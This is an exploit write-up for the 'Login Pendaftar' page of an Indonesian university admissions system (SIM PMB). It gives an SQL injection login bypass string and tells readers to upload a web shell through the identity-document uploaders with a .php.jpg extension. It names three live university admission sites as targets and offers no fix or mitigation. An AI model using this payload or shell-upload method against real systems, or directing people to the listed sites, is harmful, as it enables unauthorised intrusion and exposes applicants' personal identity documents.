[+]Exploit Title: SIM PMB Sistem Informasi Mahasiswa Pendaftaran Mahasiswa Baru Bypass SQL Login Pendaftar
[+]Author: Negat1ve
[+]Team: -1
[+]Goolge Dork: Still Thinking lol :D
[+]Tested on: Windows 10 x64
=======================================
[+]Proof Of Concept:
Find website with "Login Pendaftar" vulnerability bypass
How do we know its vuln? It giving a sign
"Untuk melihat hasil test Anda, silahkan login dengan mengisi form di bawah ini."
Login with this detail
user: ' or 1=1 limit 1 -- -+
password: ' or 1=1 limit 1 -- -+
You can upload your shell/script via Image Uploader or you can find KTP/KK/Ijasah Uploader
NB:
- Upload your script with .php.jpg extension
- I just tired for explore the uploaded path but i know where :3 try harder for explore it, happy hacking
Demo sites:
http://pmb.unsada.ac.id/login
http://pmb.unisda.ac.id/login
http://pmb.umg.ac.id/login
Greetz: Electronic Thunderbolt Team - Giant-ps - Anonymous arabe - special for Posit1ve ( my gf )